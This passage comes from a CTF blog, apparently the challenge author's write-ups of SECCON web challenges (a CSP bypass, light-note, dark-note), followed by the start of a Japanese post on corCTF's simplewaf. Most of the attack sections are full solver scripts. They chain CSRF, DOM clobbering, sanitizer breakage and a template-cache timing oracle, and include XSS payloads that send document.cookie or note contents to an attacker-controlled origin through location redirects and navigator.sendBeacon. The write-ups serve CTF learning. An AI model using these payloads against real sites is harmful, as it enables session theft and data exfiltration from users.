      const minifiedLength = {{MINIFIED_LENGTH}};
      const originalLength = {{ORIGINAL_LENGTH}};
      const rate = ((minifiedLength / originalLength) * 100) | 0;
      document.getElementById("compressionRate").innerHTML = `<b>${rate}%</b> (= ${minifiedLength} / ${originalLength})`;
    })();
  </script>
  <a href="/#{{MINIFIED_CODE}}"><button type="button" id="edit">Edit</button></a>
</body>
</html>

The function escapeHtml escapes the minified code to avoid XSS. The program assumes that minifiedLength is the length of the code.

Why it uses minifiedLength rather than minifiedCode.length as the length value? If the value of minifiedLength is controllable and is not equal to minifiedCode.length, you might be able to break the sanitization.

Here, you need to know an interesting behavior for form submissions. It is "newline normalization".

I prepared a playground to try the behavior:

<form id="form" method="post">
  <textarea id="text" name="text"></textarea>
  <button type="submit">submit</button>
</form>

When you input a string including \n and submit it, the \n is converted to \r\n:

I found a detailed post on newline normalizations. See it if you are interested:

Anyway, using \n seems to make sense. However, the \n characters will be erased by the minifier unfortunately😢.

Is there a way to maintain \n characters? See the documentation of terser:

comments (default "some") -- by default it keeps JSDoc-style comments that contain "@license", "@copyright", "@preserve" or start with !, pass true or "all" to preserve all comments, false to omit comments in the output, a regular expression string (e.g. /^!/) or a function.

The service uses default options for terser, so you can maintain \n characters using copyright comments like /*! foo\nbar */.

Step 2: CSP bypass

The service uses the following CSP:

default-src 'self';
base-uri 'none';
object-src 'none';
style-src https://unpkg.com/simpledotcss/simple.min.css;
script-src 'nonce-{{CSP_NONCE}}'

You should bypass it to XSS.

The first step of CSP bypass is using <meta> to redirect to a web site that you prepared.

For example, the following code causes a redirection:

const meta = `<meta http-equiv="Refresh" content="0; URL=${ATTACK_BASE_URL}">`;
const code = `/*!${"\n".repeat(meta.length + 3)}${meta}*/\n`;

The many \n characters will be not erased by the minifier and will be converted to \r\n characters in a form submission. So, the value of minifiedLength will be minifiedCode.length - (meta.length + 3). Then, it will bypass escapeHtml and will redirect to ATTACK_BASE_URL.

In your redirected web site, you can controll submit values freely by CSRF. Now all you have to do is gain XSS using appropriate values of minifiedCode, originalLength, and minifiedLength.

Finally, you need to break the rendering of escapeHtml so that the CSP nonce is applied to an injected script. See index.html of my solver below2.

My solution abuses the behavior of substring used in escapeHtml:

If indexStart is greater than indexEnd, then the effect of substring() is as if the two arguments were swapped; see example below.

Solver

index.js
const fastify = require("fastify")();
const fs = require("node:fs").promises;

const fail = (message) => {
  console.error(message);
  return process.exit(1);
};

const SECCON_BASE_URL = process.env.SECCON_BASE_URL ?? fail("No SECCON_BASE_URL");
const ATTACK_BASE_URL = process.env.ATTACK_BASE_URL ?? fail("No ATTACK_BASE_URL");
const LISTEN_PORT = process.env.PORT ?? "8080";

const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

const exploit = async () => {
  const meta = `<meta http-equiv="Refresh" content="0; URL=${ATTACK_BASE_URL}">`;
  const code = `/*!${"\n".repeat(meta.length + 3)}${meta}*/\n`;

  const res = await (
    await fetch(`${SECCON_BASE_URL}/report`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        code,
      }),
    })
  ).text();
  console.log(res); // "Received :)"
};

const start = async () => {
  fastify.get("/", async (req, reply) => {
    const html = await fs.readFile("index.html");
    return reply.type("text/html; charset=utf-8").send(html);
  });

  fastify.get("/print", async (req, reply) => {
    console.log(req.query.cookie); // Print a flag
    process.exit(0);
  });

  fastify.listen(
    { port: LISTEN_PORT, host: "0.0.0.0" },
    async (err, address) => {
      if (err) {
        fastify.log.error(err);
        process.exit(1);
      }

      await sleep(2 * 1000);
      await exploit();

      await sleep(10 * 1000);
      fail("Failed");
    }
  );
};
start();
index.html
<body>
  <script>
    const submit = (url, { minifiedCode, originalLength, minifiedLength }) => {
      const innerHtml = `
        <form action="${url}" method="post" target="_blank">
          <input name="minifiedCode" value="${minifiedCode}">
          <input name="originalLength" value="${originalLength}">
          <input name="minifiedLength" value="${minifiedLength}">
        </form>
      `;
      document.body.innerHTML += innerHtml;
      document.forms[document.forms.length - 1].submit();
    };

    const exploit = (url, xss) => {
      const evil = ";`*/<" + "/script>`/*";
      const len = 93;
      submit(url, {
        minifiedCode: (xss + evil).padStart(len, " "),
        originalLength: 0,
        minifiedLength: -304 + len,
      });
    };

    const baseUrl = "http://web:3000";
    exploit(
      `${baseUrl}/post#${encodeURIComponent(location.origin + "/print?cookie=")}`,
      "location = `${decodeURIComponent(location.hash.slice(1))}${document.cookie}`"
    );
  </script>
</body>

Flag

SECCON{csp_bypa55_is_a_type_0f_puzzle_games_for_h4ckerS}

[web 300] light-note

Description:

I created a blazing fast note application!

  • https://light-note.{int,dom}.seccon.games

Overview

There is a simple note application. You can create and delete notes:

Also, you can report a URL to a bot, then the bot executes the following program:

const visit = async (url) => {
  console.log(`start: ${JSON.stringify(url)}`);

  const baseUrl = `http://${APP_HOST}:${APP_PORT}`;
  /*
    To CTF players:
    Don't forget the hostname is not `web` but `localhost`.
   */

  const browser = await puppeteer.launch({
    headless: false,
    executablePath: "/usr/bin/google-chrome-stable",
    args: ["--no-sandbox"],
  });
  const context = await browser.createIncognitoBrowserContext();

  try {
    const page1 = await context.newPage();

    await page1.goto(baseUrl, { timeout: 3000 });
    await sleep(0.5 * 1000);

    await page1.waitForSelector("#note");
    await page1.type("#note", FLAG);
    await page1.waitForSelector("#createNote");
    await page1.click("#createNote");
    await sleep(0.5 * 1000);

    await page1.close();
    await sleep(1 * 1000);

    const page2 = await context.newPage();
    await page2.goto(url, { timeout: 3000 });
    await sleep(60 * 1000);
    await page2.close();
  } catch (e) {
    console.log(e);
  }

  await context.close();
  await browser.close();

  console.log(`end: ${JSON.stringify(url)}`);
};

The goal is to steal the first note of the bot.

Solution

The HTML file is as follows:

<!DOCTYPE html>
<html data-theme="light">
<head>
  <meta charset="UTF-8">
  <title>Light Note</title>
  <link rel="stylesheet" href="https://unpkg.com/@picocss/pico@latest/css/pico.min.css">
  <script type="importmap">
    {
      "imports": {
        "DOMPurify": "https://cdn.jsdelivr.net/npm/dompurify@2.4.3/dist/purify.es.min.js"
      }
    }
  </script>
</head>
<body>
  <main class="container">
    <article>
      <h2 style="margin-bottom: 1rem;">💡 Light Note</h2>
      <table>
        <tbody id="notes"></tbody>
      </table>
      <input type="text" id="note" name="note" required>
      <div style="display: flex; justify-content: end;">
        <a id="createNote" href="#" role="button">Create</a>
      </div>
    </article>
    <article>
      <input type="text" id="url" name="url" required placeholder="https://example.com">
      <div style="display: flex; justify-content: end;">
        <a id="report" href="#" role="button">Report</a>
      </div>
    </article>
    <p style="display: flex; justify-content: end;">
      <a href="/logout">Logout</a></p>
    </p>
  </main>
  <template id="noteTmpl">
    <tr><th>
      <nav>
        <ul><li class="note" style="word-break: break-all;"></li></ul>
        <ul><li><a href="#" role="button" class="delete secondary">Delete</a></li></ul>
      </nav>
    </th></tr>
  </template>
  <script type="module">
    /* snip */

    const write = async (element, input) => {
      try {
        element.setHTML(input, {
          sanitizer: new Sanitizer({ dropElements: ["link", "style"] })
        });
      } catch (e) {
        await import("DOMPurify").then(({ default: DOMPurify }) => {
          // fallback: Firefox does not support Sanitizer API yet.
          element.innerHTML = DOMPurify.sanitize(input);
        }).catch((e) => {
          // fallback: Safari does not support import maps :(
          element.innerHTML = input.replace(/[<>'"&]/, "");
        });
      }
    };

    const refresh = async () => {
      const notes = await fetch("/api/notes").then(r => r.json());

      const root = document.getElementById("notes");
      root.innerHTML = "";
      for (const [index, note] of Object.entries(notes)) {
        const elm = document.getElementById("noteTmpl").content.cloneNode(true);
        write(elm.querySelector(".note"), note);
        elm.querySelector(".delete").addEventListener("click", async () => {
          await deleteNote(index);
          await refresh();
        });
        root.appendChild(elm);
      }
    };

    const init = async () => {
      await refresh();

      /* snip */
    };

    document.addEventListener("DOMContentLoaded", init);
  </script>
</body>
</html>

When each note is rendered, the write function is used:

    const write = async (element, input) => {
      try {
        element.setHTML(input, {
          sanitizer: new Sanitizer({ dropElements: ["link", "style"] })
        });
      } catch (e) {
        await import("DOMPurify").then(({ default: DOMPurify }) => {
          // fallback: Firefox does not support Sanitizer API yet.
          element.innerHTML = DOMPurify.sanitize(input);
        }).catch((e) => {
          // fallback: Safari does not support import maps :(
          element.innerHTML = input.replace(/[<>'"&]/, "");
        });
      }
    };

The function uses Sanitizer API as a sanitizer. If an error occurs in the sanitizer, DOMPurify will be used as a fallback. Also, if an error occurs in import maps3 or DOMPurify, input.replace(/[<>'"&]/, "") will be used as a fallback. Obliviously, the replace is vulnerable for XSS because the regex uses no flags such as /g.

Thus, what you should do is to make errors so that the second fallback is used, and then you gain XSS.

Here, you need to know security considerations for Sanitizer API:

4.2. DOM clobbering
This section is not normative.
DOM clobbering describes an attack in which malicious HTML confuses an application by naming elements through id or name attributes such that properties like children of an HTML element in the DOM are overshadowed by the malicious content.
The Sanitizer API does not protect DOM clobbering attacks in its default state, but can be configured to remove id and name attributes.

The sanitizer in write is not configured to remove id and name attributes. So, it does not protect DOM Clobbering attacks.

Firstly, let's break element.setHTML(...) by DOM Clobbering.

    const refresh = async () => {
      const notes = await fetch("/api/notes").then(r => r.json());

      const root = document.getElementById("notes");
      root.innerHTML = "";
      for (const [index, note] of Object.entries(notes)) {
        const elm = document.getElementById("noteTmpl").content.cloneNode(true);
        write(elm.querySelector(".note"), note);
        elm.querySelector(".delete").addEventListener("click", async () => {
          await deleteNote(index);
          await refresh();
        });
        root.appendChild(elm);
      }
    };

If the following value is not a function, an error will occur:

document
  .getElementById("noteTmpl")
  .content
  .cloneNode(true)
  .querySelector(".note")
  .setHTML

Also, the following value must be an Element object so that the assignment to innerHTML in the second fallback is valid:

document
  .getElementById("noteTmpl")
  .content
  .cloneNode(true)
  .querySelector(".note")

These are completed by the following DOM..., really?

<form id="noteTmpl">
  <button name="content">
    <form class="note">
      <input name="setHTML">
    </form>
  </button>
</form>

Try to create the note:

Then, the following value is null:

Why? See the DOM:

The inner <form> element was removed 🤯

See HTML Living Standard:

Nested form elements violate the content model of <form>. So, the browser removes the inner <form> when constructing a DOM tree for the input4.

Hmm..., is there anything that could replace nested forms?

My solution uses form atttibute:

The following is valid as a DOM tree:

<form id="noteTmpl"></form>
<button name="content" form="noteTmpl">
  <form class="note">
    <input name="setHTML">
  </form>
</button>

Then, you can get expected results if you create the note:

You could break Sanitizer API by DOM Clobbering!

Next, you need to break import maps or DOMPurify, but this part is easier than the above.

Read the source code of DOMPurify:

  if (!window || !window.document || window.document.nodeType !== 9) {
    // Not running in a browser, provide a factory function
    // so that you can pass your own Window
    DOMPurify.isSupported = false;
    return DOMPurify;
  }

If window.document.nodeType is clobbered, DOMPurify will stop defining DOMPurify.sanitize. Then, an error will occur in DOMPurify.sanitize(input) and the second fallback will be used.

The DOM Clobbering to break DOMPurify is:

<img name="nodeType">

In summary, you can gain XSS by creating the following notes with CSRF.

First note:

<form id="noteTmpl"></form>
<button name="content" form="noteTmpl">
  <form class="note">
    <input name="setHTML">
  </form>
  <p class="delete"></p>
</button>
<img name="nodeType">

Second note:

<<img src=0 onerror="alert(1)">

Solver

index.js
const fastify = require("fastify")();
const fs = require("node:fs").promises;

const fail = (message) => {
  console.error(message);
  return process.exit(1);
};

const SECCON_BASE_URL = process.env.SECCON_BASE_URL ?? fail("No SECCON_BASE_URL");
const ATTACK_BASE_URL = process.env.ATTACK_BASE_URL ?? fail("No ATTACK_BASE_URL");
const LISTEN_PORT = "8080";

const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

const reportUrl = async (url) => {
  const res = await fetch(`${SECCON_BASE_URL}/report`, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
    body: JSON.stringify({
      url,
    }),
  }).then((r) => r.text());
  console.log(res); // "Received :)"
};

const start = async () => {
  fastify.get("/", async (req, reply) => {
    const html = await fs.readFile("index.html");
    return reply.type("text/html; charset=utf-8").send(html);
  });

  fastify.post("/", async (req, reply) => {
    console.log(req.body);
    process.exit(0);
  });

  fastify.listen(
    { port: LISTEN_PORT, host: "0.0.0.0" },
    async (err, address) => {
      if (err) fail(err.toString());

      await sleep(3 * 1000);
      await reportUrl(
        `${ATTACK_BASE_URL}?${new URLSearchParams({
          baseUrl: "http://localhost:3000",
        })}`
      );

      await sleep(20 * 1000);
      fail("Failed");
    }
  );
};
start();
index.html
<body>
  <script>
    const params = new URLSearchParams(location.search);
    const baseUrl = params.get("baseUrl");

    const sleep = async (msec) =>
      new Promise((resolve) => setTimeout(resolve, msec));

    const createNote = (note) => {
      const innerHtml = `
        <form action="${baseUrl}/api/notes/create" method="post" target="_blank">
          <input type="text" name="note">
        </form>
      `;
      document.body.innerHTML += innerHtml;
      const form = document.forms[document.forms.length - 1];
      form.note.value = note;
      form.submit();
    };

    const main = async () => {
      const note1 = `
        <form id="noteTmpl"></form>
        <button name="content" form="noteTmpl">
          <form class="note">
            <input name="setHTML">
          </form>
          <p class="delete"></p>
        </button>
        <img name="nodeType">
      `.trim();

      const note2 =
        "<" +
        `
          <img src=0 onerror="navigator.sendBeacon('${location.origin}', notes.textContent)">
        `.trim();

      createNote(note1); // DOM Clobbering
      await sleep(1000);
      createNote(note2); // XSS
      await sleep(1000);

      location = baseUrl;
    };
    main();
  </script>
</body>

Flag5

SECCON{induction_i5_one_0f_my_favarite_g4mes}

[web 500] dark-note

Description:

I created an incredibly blazing-fast note application!

Instancer:

nc dark-note.{int,dom}.seccon.games 1337

Note: The instancer has no bugs or vulnerabilities (at least in my intended solution).

Overview

This is also a note application. You can create and delete notes:

The server uses a template engine Hogan.js when rendering your notes:

Unlike light-note, the service has a login/signup system and you can change your emoji:

Also, you can report a URL to a bot, then the bot executes the following program:

const visit = async (attackUrl, { appPort, basicUsername, basicPassword }) => {
  console.log(`start: ${JSON.stringify(attackUrl)}`);
  const baseUrl = `http://${APP_HOST}:${appPort}`;

  const name = crypto.randomBytes(12).toString("base64");
  const password = crypto.randomBytes(12).toString("base64");

  const browser = await puppeteer.launch({
    headless: false,
    executablePath: "/usr/bin/google-chrome-stable",
    args: ["--no-sandbox"],
  });
  const context = await browser.createIncognitoBrowserContext();

  try {
    const page1 = await context.newPage();
    /* snip */

    await page1.goto(`${baseUrl}/signup`, { timeout: 3000 });
    await sleep(0.5 * 1000);

    // Create an account
    await page1.waitForSelector("#name");
    await page1.type("#name", name);
    await page1.waitForSelector("#password");
    await page1.type("#password", password);
    await page1.waitForSelector("#submit");
    await page1.click("#submit");
    await sleep(0.5 * 1000);

    // Create a note for each of the characters of `PADDED_FLAG`
    for (const chr of PADDED_FLAG) {
      await page1.waitForSelector("#note");
      await page1.type("#note", chr);
      await page1.waitForSelector("#createNote");
      await page1.click("#createNote");
      await sleep(0.5 * 1000);
    }

    await page1.close();
    await sleep(1 * 1000);

    //

    const page2 = await context.newPage();
    /* snip */

    // Access to the given URL
    await page2.goto(attackUrl, { timeout: 3000 });
    await sleep(60 * 1000);

    await page2.close();
  } catch (e) {
    console.log(e);
  }

  await context.close();
  await browser.close();

  console.log(`end: ${JSON.stringify(attackUrl)}`);
};

The bot creates a note for each character of a flag string:

  • S, E, C, C, O, N, {, ..., }

Solution

The HTML file is as follows:

<!DOCTYPE html>
<html data-theme="dark">
<head>
  <meta charset="UTF-8">
  <title>Dark Note</title>
  <link rel="stylesheet" href="https://unpkg.com/@picocss/pico@latest/css/pico.min.css">
</head>
<body>
  <main class="container">
    <article>
      <h2 style="margin-bottom: 1rem">⚡ Dark Note</h2>
      <table>
        <tbody id="notes"></tbody>
      </table>
      <input type="text" id="note" name="note" required placeholder="Hello, {{name}} {{emoji}}">
      <div style="display: flex; justify-content: end;">
        <a id="createNote" href="#" role="button">Create</a>
      </div>
    </article>
    <article>
      <select id="emoji" name="emoji" value="1" required></select>
      <div style="display: flex; justify-content: end;">
        <a id="changeEmoji" href="#" role="button">Change emoji</a>
      </div>
    </article>
    <article>
      <input type="text" id="url" name="url" required placeholder="https://example.com">
      <div style="display: flex; justify-content: end;">
        <a id="report" href="#" role="button">Report</a>
      </div>
    </article>
    <p style="display: flex; justify-content: end;">
      <a href="/logout">Logout</a></p>
    </p>
  </main>
  <template id="noteTmpl">
    <tr>
      <th>
        <nav>
          <ul><li class="note" style="word-break: break-all;"></li></ul>
          <ul><li><a href="#" role="button" class="delete secondary">Delete</a></li></ul>
        </nav>
      </th>
    </tr>
  </template>
  <script>
    /* snip */

    const refresh = async () => {
      const notes = await fetch("/api/notes").then(r => r.json());

      const root = document.getElementById("notes");
      root.innerHTML = "";
      for (const [index, note] of Object.entries(notes)) {
        const elm = document.getElementById("noteTmpl").content.cloneNode(true);
        elm.querySelector(".note").textContent = note;
        elm.querySelector(".delete").addEventListener("click", async () => {
          await deleteNote(index);
          await refresh();
        });
        root.appendChild(elm);
      }
    };

    const init = async () => {
      await refresh();

      /* snip */
    };

    document.addEventListener("DOMContentLoaded", init);
  </script>
</body>
</html>
elm.querySelector(".note").textContent = note;

The assignment of notes uses textContent. So, XSS seems impossible.

The server-side code for rendering notes is as follows:

const crypto = require("node:crypto");
const Hogan = require("hogan.js");

const render = (text, context) => {
  const sanitized = text.replace(/[#\^<\$\/!>=&]/g, "");
  const rendered = Hogan.compile(sanitized).render(context);
  return rendered;
};

class User {
  #locals;

  constructor(name, password, emoji) {
    const id = crypto.randomBytes(32).toString("base64");

    const notes = new Proxy([], {
      get: (target, key, receiver) => {
        return typeof key === "string" && isFinite(key)
          ? render(target[key], this.#locals)
          : Reflect.get(target, key, receiver);
      },
    });

    this.#locals = {
      id,
      name,
      password,
      emoji,
      notes,
    };
  }

  /* snip */
}

There is a Proxy using a get handler in an array notes. If you access notes[i], then you will get an rendered note with render. Obviously, there is SSTI for Hogan.js, but text.replace(/[#\^<\$\/!>=&]/g, "") limits various features of Hogan.js. "SSTI to RCE" also seems impossible.

Here, read the source code of Hogan.js:

  Hogan.compile = function(text, options) {
    options = options || {};
    var key = Hogan.cacheKey(text, options);
    var template = this.cache[key];

    if (template) {
      var partials = template.partials;
      for (var name in partials) {
        delete partials[name].instance;
      }
      return template;
    }

    template = this.generate(this.parse(this.scan(text, options.delimiters), text, options), text, options);
    return this.cache[key] = template;
  }

The template engine uses cache mechanism, and the cache key is:

  Hogan.cacheKey = function(text, options) {
    return [text, !!options.asString, !!options.disableLambda, options.delimiters, !!options.modelGet].join('||');
  }

If the text was already evaluated, the engine skips the compile process for text and uses the cached value as a compiled result.

In REPL of Node.js, let's confirm the cache effect:

> const Hogan = require("hogan.js");
undefined
>
> const render = (text, context = {}) => {
...   const sanitized = text.replace(/[#\^<\$\/!>=&]/g, "");
...   const rendered = Hogan.compile(sanitized).render(context);
...   return rendered;
... };
undefined
>
> const measure = (f) => {
...   const start = performance.now();
...   f();
...   const end = performance.now();
...   return end - start;
... };
undefined

> measure(() => render("{{x}}{{x}}{{x}}a"))
1.5557399988174438
> measure(() => render("{{x}}{{x}}{{x}}a"))
0.09384399652481079
> measure(() => render("{{x}}{{x}}{{x}}b"))
0.8712370097637177
> measure(() => render("{{x}}{{x}}{{x}}b"))
0.11031201481819153

> measure(() => render("{{x}}{{x}}{{x}}".repeat(10000) + "a"))
1345.8155919909477
> measure(() => render("{{x}}{{x}}{{x}}".repeat(10000) + "a"))
20.339904010295868
> measure(() => render("{{x}}{{x}}{{x}}".repeat(10000) + "b"))
1170.0819569826126
> measure(() => render("{{x}}{{x}}{{x}}".repeat(10000) + "b"))
7.888740986585617

The rendering time depends largely on whether cache is used or not. Is it possible to use the difference as an oracle to leak notes[i], which is the i-th character in the flag string?

To construct the oracle, you need to let the bot render the following text as a note:

const i = /* An index `i` where you want to leak the i-th character */;
const user = /* A User object of the bot */;
const text = `${i}-${user.getNotes()[i]}-${"{{x}}".repeat(20000)}`;

Btw, the deleteNote function uses Array.prototype.splice to delete a note:

  deleteNote(index) {
    if (
      typeof index !== "number" ||
      Number.isNaN(index) ||
      index < 0 ||
      index >= this.#locals.notes.length
    ) {
      throw new Error("Failed to delete a note");
    }
    this.#locals.notes.splice(index, 1);
  }

There is an interesting behavior between splice and Proxy:

> const notes = new Proxy([], {
...   get: (target, key, receiver) => {
...     return typeof key === "string" && isFinite(key)
...       ? target[key] + "x"
...       : Reflect.get(target, key, receiver);
...   },
... });
undefined

> notes.push("1"); notes.push("2"); notes.push("3");
3
> notes
Proxy [ [ '1', '2', '3' ], { get: [Function: get] } ]

> notes.splice(1, 1)
[ '2x' ]
> notes
Proxy [ [ '1', '3x' ], { get: [Function: get] } ]
> notes[1]
'3xx' // '3' -> '3x' -> '3xx'

When notes.splice(1, 1) was executed, the get handler of Proxy was implicitly called and "3" changed to "3x". So, the final result of notes[1] was "3xx" because the get handler was called again.

My solution abuses the above behavior to construct a time-based oracle.

Firstly, my solver lets the bot pollute cache in the template engine as follows (in index.html):

    const polluteCache = async (flagIndex) => {
      const evilNote = `${flagIndex}-{{notes.${flagIndex}}}-{{emoji}}`;
      createNote("dummy");
      await sleep(500);
      createNote(evilNote);
      await sleep(500);
      deleteNote(MAX_FLAG_LENGTH);
      await sleep(1000);
      deleteNote(MAX_FLAG_LENGTH);
      await sleep(1000);
    }

    const main = async () => {
      const heavyTemplate = "{{x}}".repeat(HEAVY_LEVEL);
      changeEmoji(heavyTemplate);
      await sleep(1000);

      const known = "SECCON{";
      for (let i = known.length; i<MAX_FLAG_LENGTH; i++) {
        await polluteCache(i);
      }
      navigator.sendBeacon(`${location.origin}/start-leak`);
    };
    main();

Next, my solver leaks the flag characters using the time-based oracle as follows (in index.js):

const leak = async (flagIndex, cookie) => {
  let minTime = 1e10;
  let minChar;
  for (const char of CHARS) {
    const note = `${flagIndex}-${char}-${"{{x}}".repeat(HEAVY_LEVEL)}`;
    await createNote(note, cookie);
    const time = await measureTime(cookie);
    await deleteNote(0, cookie);
    if (time < minTime) {
      minTime = time;
      minChar = char;
    }
  }
  if (!minChar) fail(`Failed at ${flagIndex}`);

  return minChar;
};

const exploit = async () => {
  /* snip */
  const cookie = /* snip (a cookie of your account) */;

  let prefix = "SECCON{";
  while (!prefix.endsWith("}")) {
    prefix += await leak(prefix.length, cookie);
    console.log(prefix);
    await sleep(500);
  }

  console.log(`Flag: ${prefix}`);
  process.exit(0);
};

See my solver below for details.

Solver

index.js
const fastify = require("fastify")();
const fs = require("node:fs").promises;
const crypto = require("node:crypto");

const fail = (message) => {
  console.error(message);
  return process.exit(1);
};

const SECCON_BASE_URL = process.env.SECCON_BASE_URL ?? fail("No SECCON_BASE_URL");
const ATTACK_BASE_URL = process.env.ATTACK_BASE_URL ?? fail("No ATTACK_BASE_URL");
const LISTEN_PORT = "8080";

const CHARS = "}_abcdefghijklmnopqrstuvwxyz0123456789";
const HEAVY_LEVEL = 20000;

const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

const reportUrl = async (url) => {
  const res = await fetch(`${SECCON_BASE_URL}/report`, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
    body: JSON.stringify({
      url,
    }),
  }).then((r) => r.text());
  console.log(res); // "Received :)"
};

const createNote = (note, cookie) =>
  fetch(`${SECCON_BASE_URL}/api/notes/create`, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      Cookie: cookie,
    },
    body: JSON.stringify({
      note,
    }),
  });

const deleteNote = (index, cookie) =>
  fetch(`${SECCON_BASE_URL}/api/notes/delete`, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      Cookie: cookie,
    },
    body: JSON.stringify({
      index,
    }),
  });

const measureTime = async (cookie) => {
  const start = performance.now();
  await fetch(`${SECCON_BASE_URL}/api/notes`, {
    method: "GET",
    headers: {
      Cookie: cookie,
    },
  });
  return performance.now() - start;
};

const leak = async (flagIndex, cookie) => {
  let minTime = 1e10;
  let minChar;
  for (const char of CHARS) {
    const note = `${flagIndex}-${char}-${"{{x}}".repeat(HEAVY_LEVEL)}`;
    await createNote(note, cookie);
    const time = await measureTime(cookie);
    await deleteNote(0, cookie);
    if (time < minTime) {
      minTime = time;
      minChar = char;
    }
  }
  if (!minChar) fail(`Failed at ${flagIndex}`);

  return minChar;
};

const exploit = async () => {
  const name = crypto.randomBytes(12).toString("base64");
  const password = crypto.randomBytes(12).toString("base64");

  const res = await fetch(`${SECCON_BASE_URL}/signup`, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
    body: JSON.stringify({
      name,
      password,
      emoji: "x",
    }),
    redirect: "manual",
  });
  const cookie = res.headers.get("Set-Cookie").split(";")[0];

  let prefix = "SECCON{";
  while (!prefix.endsWith("}")) {
    prefix += await leak(prefix.length, cookie);
    console.log(prefix);
    await sleep(500);
  }

  console.log(`Flag: ${prefix}`);
  process.exit(0);
};

const start = async () => {
  fastify.get("/", async (req, reply) => {
    const html = await fs.readFile("index.html");
    return reply.type("text/html; charset=utf-8").send(html);
  });

  fastify.post("/start-leak", async (req, reply) => {
    console.log("leak:");
    exploit();
    return "";
  });

  fastify.listen(
    { port: LISTEN_PORT, host: "0.0.0.0" },
    async (err, address) => {
      if (err) fail(err.toString());

      await sleep(2 * 1000);
      await reportUrl(
        `${ATTACK_BASE_URL}?${new URLSearchParams({
          baseUrl: "http://web:3000",
        })}`
      );

      await sleep(180 * 1000);
      fail("Failed");
    }
  );
};
start();
index.html
<body>
  <script>
    const params = new URLSearchParams(location.search);
    const baseUrl = params.get("baseUrl");

    const MAX_FLAG_LENGTH = 16;
    const HEAVY_LEVEL = 20000;

    const sleep = async (msec) =>
      new Promise((resolve) => setTimeout(resolve, msec));

    const createNote = (note) => {
      const innerHtml = `
        <form action="${baseUrl}/api/notes/create" method="post" target="_blank">
          <input type="text" name="note" value="${note}">
        </form>
      `;
      document.body.innerHTML += innerHtml;
      document.forms[document.forms.length - 1].submit();
    };

    const deleteNote = (index) => {
      const innerHtml = `
        <form action="${baseUrl}/api/notes/delete" method="post" target="_blank">
          <input type="text" name="index" value="${index}">
        </form>
      `;
      document.body.innerHTML += innerHtml;
      document.forms[document.forms.length - 1].submit();
    };

    const changeEmoji = (emoji) => {
      const innerHtml = `
        <form action="${baseUrl}/api/emojis/change" method="post" target="_blank">
          <input type="text" name="emoji" value="${emoji}">
        </form>
      `;
      document.body.innerHTML += innerHtml;
      document.forms[document.forms.length - 1].submit();
    };

    const polluteCache = async (flagIndex) => {
      const evilNote = `${flagIndex}-{{notes.${flagIndex}}}-{{emoji}}`;
      createNote("dummy");
      await sleep(500);
      createNote(evilNote);
      await sleep(500);
      deleteNote(MAX_FLAG_LENGTH);
      await sleep(1000);
      deleteNote(MAX_FLAG_LENGTH);
      await sleep(1000);
    }

    const main = async () => {
      const heavyTemplate = "{{x}}".repeat(HEAVY_LEVEL);
      changeEmoji(heavyTemplate);
      await sleep(1000);

      const known = "SECCON{";
      for (let i = known.length; i<MAX_FLAG_LENGTH; i++) {
        await polluteCache(i);
      }
      navigator.sendBeacon(`${location.origin}/start-leak`);
    };
    main();
  </script>
</body>

Flag6

SECCON{d0wnwe11}

Footnotes

  1. Actually, I discovered the Prototype Pollution before I found this report. Although I don't like 0-day challenges in CTF, it's not 0-day in this case. Also, the part of "Prototype Pollution to RCE" is interesting for me. So I decided to create this challenge.

  2. The CSP bypass is too complicated to explain. So, please try it with your hands 🙌

  3. Firefox has recently added support for import maps at version 108 🎉
    ref. https://www.mozilla.org/en-US/firefox/108.0/releasenotes/

  4. However, we can construct nested forms by DOM manipulation in JavaScript.
    E.g. document.body.appendChild(document.createElement("form")).appendChild(document.createElement("form"))
    ref. https://html.spec.whatwg.org/#association-of-controls-and-forms

  5. https://store.steampowered.com/app/381890/Induction

  6. https://store.steampowered.com/app/360740/Downwell

]]> CTF <![CDATA[CTF: Best Web Challenges 2022]]> https://blog.arkark.dev/2022/12/17/best-web-challs https://blog.arkark.dev/2022/12/17/best-web-challs Sat, 17 Dec 2022 00:00:00 GMT この記事はCTF Advent Calendar 2022 17日目の記事です。

16日目はLaikaさんの「Wani HackaseのSlackにあるスラッシュコマンドの紹介」です。CTFtimeからシュッと情報を取ってきて選ぶ形式はおもしろくていいですね。

さて、本日は今年見たweb問で特に好きな問題を紹介します1

【シンプル部門】 simplewaf - corCTF 2022

  • 難易度目安: ★☆☆

今年出会った問題の中で一番好きなweb問です。非常にシンプルでありつつ、CTFらしい楽しさが詰まっている感動的な問題でした。

本質的なソースコードは以下のJavaScript(Node.js)のファイルだけです:

const express = require("express");
const fs = require("fs");

const app = express();

const PORT = process.env.PORT || 3456;

app.use((req, res, next) => {
    if([req.body, req.headers, req.query].some(
        (item) => {
            return item && JSON.stringify(item).includes("flag")
        }
    )) {
        return res.send("bad hacker!");
    }
    next();
});

app.get("/", (req, res) => {
    try {
        res.setHeader("Content-Type", "text/html");
        res.send(fs.readFileSync(req.query.file || "index.html").toString());
    }
    catch(err) {
        console.log(err);
        res.status(500).send("Internal server error");
    }
});

app.listen(PORT, () => console.log(`web/simplewaf listening on port ${PORT}`));

フラグファイルがサーバ上のflag.txtにあるので、これをLFIするのがゴールです。ただし、req.bodyreq.headersreq.queryのいずれかに、(JSONとして)flagの文字列が含まれていた場合はそのリクエストがリジェクトされます。

一見フラグファイルを盗むのは不可能なんですが、Node.jsのfs.readFileSyncの実装を掘っていくと、"いい感じ"のオブジェクトがURLオブジェクトとして認識されるということがわかり、それを利用するとバイパスが可能です。

fs.readFileSyncの動作デモ:

> const fs = require("fs")
undefined

// 通常の、ファイルパスを文字列として指定する例
> fs.readFileSync("flag.txt").toString()
'corctf{test_flag}'

// オブジェクトを指定してflag.txtを読む例
> fs.readFileSync({href: "x", origin: "x", protocol: "file:", hostname: "", pathname: "flag.txt"}).toString()
'corctf{test_flag}'

// オブジェクト経由だとファイルパス部分にパーセントエンコードが使える
